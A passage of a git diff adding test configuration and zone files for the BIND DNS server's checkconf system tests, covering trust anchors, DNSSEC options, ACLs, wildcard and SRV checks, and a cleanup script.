RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN + R1AkUTV74bU="; +}; diff --git a/bin/tests/system/checkconf/check-root-ksk-both.conf b/bin/tests/system/checkconf/check-root-ksk-both.conf new file mode 100644 index 0000000..88c308f --- /dev/null +++ b/bin/tests/system/checkconf/check-root-ksk-both.conf @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + # This key (19036) is to be phased out starting in 2017. It will + # remain in the root zone for some time after its successor key + # has been added. It will remain this file until it is removed from + # the root zone. + . initial-key 257 3 8 "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF + FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX + bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD + X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz + W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS + Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq + QxA+Uk1ihz0="; + + # This key (20326) was published in the root zone in 2017. + # Servers which were already using the old key (19036) should + # roll seamlessly to this new one via RFC 5011 rollover. Servers + # being set up for the first time can use the contents of this + # file as initializing keys; thereafter, the keys in the + # managed key database will be trusted and maintained + # automatically. + . initial-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3 + +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv + ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF + 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e + oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd + RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN + R1AkUTV74bU="; +}; diff --git a/bin/tests/system/checkconf/check-root-static-ds.conf b/bin/tests/system/checkconf/check-root-static-ds.conf new file mode 100644 index 0000000..eb37b85 --- /dev/null +++ b/bin/tests/system/checkconf/check-root-static-ds.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + . static-ds 20326 8 2 "E06D44B80B8F1D39A95C0B0D7C65D08458E880409BBC683457104237C7F8EC8D"; +}; diff --git a/bin/tests/system/checkconf/check-root-static-key.conf b/bin/tests/system/checkconf/check-root-static-key.conf new file mode 100644 index 0000000..7be5304 --- /dev/null +++ b/bin/tests/system/checkconf/check-root-static-key.conf @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + # This key (20326) was published in the root zone in 2017. + # Servers which were already using the old key (19036) should + # roll seamlessly to this new one via RFC 5011 rollover. Servers + # being set up for the first time can use the contents of this + # file as initializing keys; thereafter, the keys in the + # managed key database will be trusted and maintained + # automatically. + . static-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3 + +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv + ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF + 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e + oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd + RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN + R1AkUTV74bU="; +}; diff --git a/bin/tests/system/checkconf/check-root-trusted-key.conf b/bin/tests/system/checkconf/check-root-trusted-key.conf new file mode 100644 index 0000000..65261a8 --- /dev/null +++ b/bin/tests/system/checkconf/check-root-trusted-key.conf @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trusted-keys { + # This key (20326) was published in the root zone in 2017. + # Servers which were already using the old key (19036) should + # roll seamlessly to this new one via RFC 5011 rollover. Servers + # being set up for the first time can use the contents of this + # file as initializing keys; thereafter, the keys in the + # managed key database will be trusted and maintained + # automatically. + . 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3 + +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv + ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF + 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e + oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd + RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN + R1AkUTV74bU="; +}; diff --git a/bin/tests/system/checkconf/check-srv-cname-fail.conf b/bin/tests/system/checkconf/check-srv-cname-fail.conf new file mode 100644 index 0000000..e5f9349 --- /dev/null +++ b/bin/tests/system/checkconf/check-srv-cname-fail.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + check-integrity yes; // default is yes +}; + +zone "check-srv-cname" { + type master; + file "check-srv-cname.db"; + check-srv-cname fail; +}; diff --git a/bin/tests/system/checkconf/check-srv-cname.db b/bin/tests/system/checkconf/check-srv-cname.db new file mode 100644 index 0000000..0671ab1 --- /dev/null +++ b/bin/tests/system/checkconf/check-srv-cname.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 ; 10 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + MX 10 mail + +mail A 10.0.0.1 +ns2 A 10.53.0.2 + +check-srv-cname SRV 1 2 3 target +; SRV points to a CNAME which is detected by check-srv-cname configuration +target CNAME mail diff --git a/bin/tests/system/checkconf/check-wildcard-no.conf b/bin/tests/system/checkconf/check-wildcard-no.conf new file mode 100644 index 0000000..beb641a --- /dev/null +++ b/bin/tests/system/checkconf/check-wildcard-no.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "check-wildcard" { + type primary; + file "check-wildcard.db"; + check-wildcard no; +}; diff --git a/bin/tests/system/checkconf/check-wildcard.conf b/bin/tests/system/checkconf/check-wildcard.conf new file mode 100644 index 0000000..263f8b4 --- /dev/null +++ b/bin/tests/system/checkconf/check-wildcard.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "check-wildcard" { + type primary; + file "check-wildcard.db"; + check-wildcard yes; +}; diff --git a/bin/tests/system/checkconf/check-wildcard.db b/bin/tests/system/checkconf/check-wildcard.db new file mode 100644 index 0000000..1db5af0 --- /dev/null +++ b/bin/tests/system/checkconf/check-wildcard.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 ; 10 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 +; an interior wildcard name +foo.* TXT The owner name contains an interior wildcard diff --git a/bin/tests/system/checkconf/clean.sh b/bin/tests/system/checkconf/clean.sh new file mode 100644 index 0000000..0d6001d --- /dev/null +++ b/bin/tests/system/checkconf/clean.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f bad-kasp-keydir1.conf +rm -f bad-kasp-keydir2.conf +rm -f bad-kasp-keydir3.conf +rm -f bad-kasp-keydir4.conf +rm -f bad-kasp-keydir5.conf +rm -f checkconf.out* +rm -f diff.out* +rm -f good-kasp.conf.in +rm -f good-server-christmas-tree.conf +rm -f good.conf.in good.conf.out badzero.conf *.out +rm -f ns*/named.lock +rm -rf test.keydir diff --git a/bin/tests/system/checkconf/deprecated-masterfile-format-map.conf b/bin/tests/system/checkconf/deprecated-masterfile-format-map.conf new file mode 100644 index 0000000..634ca14 --- /dev/null +++ b/bin/tests/system/checkconf/deprecated-masterfile-format-map.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { ::1; }; + masterfile-format map; +}; diff --git a/bin/tests/system/checkconf/deprecated.conf b/bin/tests/system/checkconf/deprecated.conf new file mode 100644 index 0000000..82a555d --- /dev/null +++ b/bin/tests/system/checkconf/deprecated.conf @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +server 1.2.3.4 { + query-source 10.10.10.10 dscp 10; +}; + +options { + dnssec-validation yes; + dscp 10; +}; + +trusted-keys { + fake.trusted. 257 3 8 + "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF + FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX + bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD + X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz + W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS + Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq + QxA+Uk1ihz0="; +}; + +managed-keys { + fake.managed. initial-key 257 3 8 + "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3 + +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv + ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF + 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e + oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd + RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN + R1AkUTV74bU="; +}; diff --git a/bin/tests/system/checkconf/dlz-bad.conf b/bin/tests/system/checkconf/dlz-bad.conf new file mode 100644 index 0000000..b279ccf --- /dev/null +++ b/bin/tests/system/checkconf/dlz-bad.conf @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dlz one { + database "one"; +}; + +dlz two { + database "two"; + search no; +}; + +zone master { + type master; + database "none"; + dlz two; +}; diff --git a/bin/tests/system/checkconf/dnssec.1 b/bin/tests/system/checkconf/dnssec.1 new file mode 100644 index 0000000..ac79651 --- /dev/null +++ b/bin/tests/system/checkconf/dnssec.1 @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnssec-enable no; +}; diff --git a/bin/tests/system/checkconf/dnssec.2 b/bin/tests/system/checkconf/dnssec.2 new file mode 100644 index 0000000..6eaa372 --- /dev/null +++ b/bin/tests/system/checkconf/dnssec.2 @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view view1 { + match-clients { any; }; + dnssec-validation yes; +}; + +view view2 { + match-clients { none; }; + dnssec-validation auto; +}; + +view view3 { + match-clients { none; }; + auto-dnssec maintain; +}; diff --git a/bin/tests/system/checkconf/dnssec.3 b/bin/tests/system/checkconf/dnssec.3 new file mode 100644 index 0000000..93b6ac2 --- /dev/null +++ b/bin/tests/system/checkconf/dnssec.3 @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view view1 { + match-clients { any; }; +}; + +view view2 { + match-clients { none; }; +}; + +view view3 { + match-clients { none; }; + dnssec-validation auto; +}; + +view view4 { + match-clients { none; }; +}; + +view view5 { + match-clients { none; }; + auto-dnssec off; +}; diff --git a/bin/tests/system/checkconf/dnssec.4 b/bin/tests/system/checkconf/dnssec.4 new file mode 100644 index 0000000..53e5d91 --- /dev/null +++ b/bin/tests/system/checkconf/dnssec.4 @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "test" { + type primary; + file "test.db"; + auto-dnssec maintain; +}; diff --git a/bin/tests/system/checkconf/good-acl.conf b/bin/tests/system/checkconf/good-acl.conf new file mode 100644 index 0000000..be32923 --- /dev/null +++ b/bin/tests/system/checkconf/good-acl.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl a { + { "none"; }; + { !19.0.0.0/8; }; +}; + +options { + allow-query { a; }; +}; diff --git a/bin/tests/system/checkconf/good-allow-update-forwarding-view.conf b/bin/tests/system/checkconf/good-allow-update-forwarding-view.conf new file mode 100644 index 0000000..5bc9232 --- /dev/null +++ b/bin/tests/system/checkconf/good-allow-update-forwarding-view.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + allow-update-forwarding { any; }; +}; diff --git a/bin/tests/system/checkconf/good-allow-update-forwarding.conf b/bin/tests/system/checkconf/good-allow-update-forwarding.conf new file mode 100644 index 0000000..d7e89be --- /dev/null +++ b/bin/tests/system/checkconf/good-allow-update-forwarding.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + allow-update-forwarding { any; }; +}; diff --git a/bin/tests/system/checkconf/good-allow-update-view.conf b/bin/tests/system/checkconf/good-allow-update-view.conf new file mode 100644 index 0000000..da799a2 --- /dev/null +++ b/bin/tests/system/checkconf/good-allow-update-view.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + allow-update { any; }; +}; diff --git a/bin/tests/system/checkconf/good-allow-update.conf b/bin/tests/system/checkconf/good-allow-update.conf new file mode 100644 index 0000000..6b7a67e --- /dev/null +++ b/bin/tests/system/checkconf/good-allow-update.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + allow-update { any; }; +}; diff --git a/bin/tests/system/checkconf/good-class.conf b/bin/tests/system/checkconf/good-class.conf new file mode 100644 index 0000000..2f8c321 --- /dev/null +++ b/bin/tests/system/checkconf/good-class.conf @@ -0,0 +1,14 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view "example" class00 { }; diff --git a/bin/tests/system/checkconf/good-dnskey-validity-3660.conf b/bin/tests/system/checkconf/good-dnskey-validity-3660.conf new file mode 100644 index 0000000..4e0a7ee --- /dev/null +++ b/bin/tests/system/checkconf/good-dnskey-validity-3660.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnskey-sig-validity 3660; /* maximum value 10 years */ +}; diff --git a/bin/tests/system/checkconf/good-dnskey-validity-zero.conf b/bin/tests/system/checkconf/good-dnskey-validity-zero.conf new file mode 100644 index 0000000..5da41b8 --- /dev/null +++ b/bin/tests/system/checkconf/good-dnskey-validity-zero.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnskey-sig-validity 0; /* 0 is disabled */ +}; diff --git a/bin/tests/system/checkconf/good-ds-key-1.conf b/bin/tests/system/checkconf/good-ds-key-1.conf new file mode 100644 index 0000000..de7de84 --- /dev/null +++ b/bin/tests/system/checkconf/good-ds-key-1.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + example. initial-ds 60724 5 1 "D74CF845955A0DFE604AF215E948E67D2EA94FF3"; + example. initial-key 257 3 5 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbody0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQYfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuwE60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn6zqCkwuMmrU="; +}; diff --git a/bin/tests/system/checkconf/good-ds-key-2.conf b/bin/tests/system/checkconf/good-ds-key-2.conf new file mode 100644 index 0000000..060fb2f --- /dev/null +++ b/bin/tests/system/checkconf/good-ds-key-2.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + example. static-ds 60724 5 1 "D74CF845955A0DFE604AF215E948E67D2EA94FF3"; + example. static-key 257 3 5 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbody0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQYfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuwE60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn6zqCkwuMmrU="; +}; diff --git a/bin/tests/system/checkconf/good-dup-managed-key.conf b/bin/tests/system/checkconf/good-dup-managed-key.conf new file mode 100644 index 0000000..2f91247 --- /dev/null +++ b/bin/tests/system/checkconf/good-dup-managed-key.conf @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnssec-validation yes; +}; + +trust-anchors { + example. initial-key 257 3 8 "AwEAAawvFp8GlBx8Qt6yaIqXkDe+nMkSk2HkTAG7qlVBo++AQwZ1j3Xl + 25IN4jsw0VTMbKUbafw9DYsVzztIwx1sNkKRLo6qP9SSkBL8RicQaafG + tURtsYI3oqte5qqLve1CUpRD8J06Pg1xkOxsDlz9sQAyiQrOyvMbykJY + kYrFYGLzYAgl/JtMyVVYlBl9pqxQuAPKYPOuO1axaad/wLN3+wTy/hcJ + fpvJpqzXlDF9bI5RmpoX/7geZ06vpcYJEoT0xkkmPlEl0ZjEDrm/WIaS + WG0/CEDpHcOXFz4OEczMVpY+lnuFfKybwF1WHFn2BwVEOS6cMM6ukIjI + NQyrszHhWUU="; + example. initial-key 257 3 8 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbod + y0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQ + YfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX + 2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuw + E60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/ + Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn + 6zqCkwuMmrU="; +}; diff --git a/bin/tests/system/checkconf/good-dup-trusted-key.conf b/bin/tests/system/checkconf/good-dup-trusted-key.conf new file mode 100644 index 0000000..46089c4 --- /dev/null +++ b/bin/tests/system/checkconf/good-dup-trusted-key.conf @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnssec-validation yes; +}; + +trusted-keys { + example. 257 3 8 "AwEAAawvFp8GlBx8Qt6yaIqXkDe+nMkSk2HkTAG7qlVBo++AQwZ1j3Xl + 25IN4jsw0VTMbKUbafw9DYsVzztIwx1sNkKRLo6qP9SSkBL8RicQaafG + tURtsYI3oqte5qqLve1CUpRD8J06Pg1xkOxsDlz9sQAyiQrOyvMbykJY + kYrFYGLzYAgl/JtMyVVYlBl9pqxQuAPKYPOuO1axaad/wLN3+wTy/hcJ + fpvJpqzXlDF9bI5RmpoX/7geZ06vpcYJEoT0xkkmPlEl0ZjEDrm/WIaS + WG0/CEDpHcOXFz4OEczMVpY+lnuFfKybwF1WHFn2BwVEOS6cMM6ukIjI + NQyrszHhWUU="; + example. 257 3 8 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbod + 